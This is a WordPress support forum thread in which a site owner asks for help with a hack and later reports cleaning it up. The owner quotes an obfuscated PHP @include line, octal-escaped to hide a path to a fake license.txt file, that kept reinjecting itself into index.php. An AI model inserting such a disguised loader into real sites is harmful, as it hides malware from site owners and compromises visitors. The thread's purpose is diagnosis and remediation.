Title: Hacked database
Last modified: June 26, 2023

---

# Hacked database

 *  Resolved [notbanksy](https://wordpress.org/support/users/notbanksy/)
 * (@notbanksy)
 * [2 years, 11 months ago](https://wordpress.org/support/topic/hacked-database-2/)
 * Hi everyone
 * I’m hoping someone can help me with a hacked site, or even point me in the right
   direction.
 * My site’s index.php has this line at the top:
 *     ```wp-block-code
       <?php @include("\167\160\55\151\156\143\154\165\144\145\163\57\151\155\141\147\145\163\57\154\151\143\145\156\163\145\56\164\170\164"); ?>
       ```
   
 * If I delete it, it just comes straight back. My site’s wp directory is domain.
   com/blog/ and the affected index.php is on the domain root. It’s not the wp index,
   but one I made which calls the most recent posts from the blog.
 * I asked my host for support, and the agent told me the database was hacked, which
   is why the code in my index.php keeps reappearing.
 * The strange thing is I can still access my wp installation on /blog/. So I’ve
   logged in, updated everything, updated the php version, and run some malware 
   scanning plugins. So far nothing’s come up.
 * Has anyone come across this hack before? Can anyone point me in the right direction
   to find the malicious code in the database so I can repair the site?
 * Thank you.
 * [edit]
 * So I’ve managed to change something, but I don’t know what. I found a backup 
   of my original index.php file, and I overwrote the broken one with it. It was
   immediately overwritten, but without the code shown above. My index.php file 
   is now:
 *     ```wp-block-code
       <?php
       /**
        * Front to the WordPress application. This file doesn't do anything, but loads
        * wp-blog-header.php which does and tells WordPress to load the theme.
        *
        * @package WordPress
        */
   
       /**
        * Tells WordPress to load the WordPress theme and output it.
        *
        * @var bool
        */
       define( 'WP_USE_THEMES', true );
   
       /** Loads the WordPress Environment and Template */
       require __DIR__ . '/wp-blog-header.php';
       ```
   
 * Thanks for looking.
    -  This topic was modified 2 years, 11 months ago by [notbanksy](https://wordpress.org/support/users/notbanksy/).

Viewing 4 replies - 1 through 4 (of 4 total)

 *  Moderator [t-p](https://wordpress.org/support/users/t-p/)
 * (@t-p)
 * [2 years, 11 months ago](https://wordpress.org/support/topic/hacked-database-2/#post-16849811)
 * Carefully follow [this guide](https://wordpress.org/support/article/faq-my-site-was-hacked/).
 * When you’re done, you may want to implement some (if not all) of [the recommended security measures](https://wordpress.org/support/article/hardening-wordpress/)
   and [start backing up your site](https://wordpress.org/support/article/wordpress-backups/).
 *  Thread Starter [notbanksy](https://wordpress.org/support/users/notbanksy/)
 * (@notbanksy)
 * [2 years, 11 months ago](https://wordpress.org/support/topic/hacked-database-2/#post-16852775)
 * Thanks [@t-p](https://wordpress.org/support/users/t-p/) I’m working through it
   now.
 *  Thread Starter [notbanksy](https://wordpress.org/support/users/notbanksy/)
 * (@notbanksy)
 * [2 years, 11 months ago](https://wordpress.org/support/topic/hacked-database-2/#post-16855780)
 * I’m not having any luck so far. I’m going to carry on installing malware plugins
   etc and learning what I can, but I had another idea. I wonder if someone can 
   tell me if this will work.
 * I’ve set up a sandbox wp install in another domain directory. Then I exported
   all the content from the broken site using the export feature in the dashboard,
   and imported it to the sandbox site.
 * If I change the sandbox urls in the database, will it work if I just point my
   broken site to the sandbox db?
 *  Thread Starter [notbanksy](https://wordpress.org/support/users/notbanksy/)
 * (@notbanksy)
 * [2 years, 10 months ago](https://wordpress.org/support/topic/hacked-database-2/#post-16878932)
 * I seem to have solved it. Leaving the solution here in case anyone else finds
   the same issue.
 * The hack didn’t come from the database after all (at least as far as I can tell.)
   I tracked it down to root/wp-content/images/license.txt
 * Once I got rid of that file, I was able to reinstate my index.php file.
    -  This reply was modified 2 years, 10 months ago by [notbanksy](https://wordpress.org/support/users/notbanksy/).

Viewing 4 replies - 1 through 4 (of 4 total)

The topic ‘Hacked database’ is closed to new replies.

 * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
 * 5 replies
 * 2 participants
 * Last reply from: [notbanksy](https://wordpress.org/support/users/notbanksy/)
 * Last activity: [2 years, 10 months ago](https://wordpress.org/support/topic/hacked-database-2/#post-16878932)
 * Status: resolved

## Topics

### Topics with no replies

### Non-support topics

### Resolved topics

### Unresolved topics

### All topics